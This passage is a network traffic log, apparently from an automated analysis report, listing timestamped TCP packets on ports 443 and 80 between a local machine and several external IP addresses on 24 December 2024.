                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.431431055 CET44349969162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.431550980 CET49969443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.431623936 CET49969443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.431641102 CET44349969162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.434086084 CET44349972172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.434175014 CET44349972172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.434226990 CET49972443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.434273005 CET49972443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.434281111 CET44349972172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.522514105 CET44349976162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.522567987 CET44349976162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.522658110 CET49976443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.524136066 CET49976443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.524146080 CET44349976162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.599221945 CET44349987162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.599383116 CET44349987162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.599458933 CET49987443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.643513918 CET44349992172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.643589020 CET44349992172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.643724918 CET49992443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.646589994 CET49987443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.646620035 CET44349987162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.647326946 CET49992443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.647360086 CET44349992172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.710244894 CET4434998218.161.69.30192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.710838079 CET49982443192.168.2.618.161.69.30
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.710849047 CET4434998218.161.69.30192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.711901903 CET4434998218.161.69.30192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.711966038 CET49982443192.168.2.618.161.69.30
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.713061094 CET49982443192.168.2.618.161.69.30
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.713128090 CET4434998218.161.69.30192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.786741972 CET49982443192.168.2.618.161.69.30
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.786753893 CET4434998218.161.69.30192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.975590944 CET49982443192.168.2.618.161.69.30
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.167635918 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.167670965 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.167865038 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.168025970 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.168108940 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.168189049 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.168541908 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.168557882 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.168679953 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.168715954 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228063107 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228091002 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228400946 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228605986 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228646994 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228705883 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228821993 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228838921 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228935957 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.228964090 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.406948090 CET44349990188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.407011986 CET49990443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.407042027 CET44349990188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.407058001 CET44349990188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.407102108 CET49990443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.407886982 CET49990443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.407905102 CET44349990188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.522680998 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.522978067 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.523008108 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.524379015 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.524745941 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.524884939 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.524960041 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.636794090 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.637087107 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.637151003 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.637624025 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.637933016 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.638021946 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.638071060 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.639723063 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.639807940 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.640270948 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.640285969 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642071009 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642082930 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642175913 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642215967 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642230988 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642246008 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642338991 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642374992 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642401934 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642415047 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642488956 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642513990 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642519951 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642530918 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642651081 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642676115 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642750978 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642769098 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642815113 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642832994 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642860889 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642879009 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642921925 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642939091 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642957926 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.642975092 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.643008947 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.643024921 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.643079042 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.643098116 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.643126965 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.643141031 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.659856081 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.668739080 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.668957949 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.668981075 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669352055 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669704914 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669780970 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.669831991 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.683335066 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.711350918 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.782927990 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956413984 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956610918 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956775904 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956880093 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.956901073 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.071547031 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.071645975 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.071713924 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.071798086 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.071839094 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.103423119 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.103488922 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.103629112 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.103697062 CET49998443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.103715897 CET44349998172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.202132940 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.202219963 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.202363968 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.202969074 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.202999115 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.405972958 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.406534910 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.406833887 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.406889915 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.406960011 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.406980038 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.407295942 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.407655001 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.407721043 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.408385038 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.408499956 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.408797026 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.408888102 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.445038080 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.445286989 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.445307016 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.445597887 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.445975065 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.446050882 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.446059942 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.446259022 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.446279049 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.447810888 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.447923899 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.448291063 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.448370934 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.457839966 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.457858086 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.488061905 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.488061905 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.656855106 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.656855106 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.656903982 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.759412050 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.038902044 CET4970680192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.330447912 CET8049706199.232.214.172192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.330522060 CET4970680192.168.2.6199.232.214.172
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.598740101 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.598814964 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.598937988 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.598937988 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.613070011 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.613152027 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.618954897 CET49995443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.618989944 CET44349995188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.626276970 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.626327038 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762218952 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762275934 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762336969 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762356997 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762384892 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762396097 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762455940 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762456894 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762480021 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762509108 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762542009 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762562037 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762634039 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.762655973 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.320333958 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.320343018 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.320405006 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.320596933 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.320609093 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.585463047 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.585566998 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.585654974 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.585958958 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.585992098 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.894718885 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.894766092 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.894826889 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.895097971 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.895117998 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.277134895 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.277194023 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.277262926 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.281670094 CET50011443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.281722069 CET44350011188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.444071054 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.444101095 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.444168091 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.444490910 CET50029443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.444502115 CET44350029188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.004477024 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.004534006 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.005098104 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.007644892 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.007663965 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.008141994 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.017997026 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.018086910 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.026822090 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.026833057 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031004906 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031011105 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031356096 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031374931 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031428099 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031434059 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031636000 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031661034 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031826019 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031835079 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031863928 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.031892061 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032269001 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032279015 CET44350022188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032305956 CET50022443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.032310963 CET44350022188.245.216.205192.168.2.6
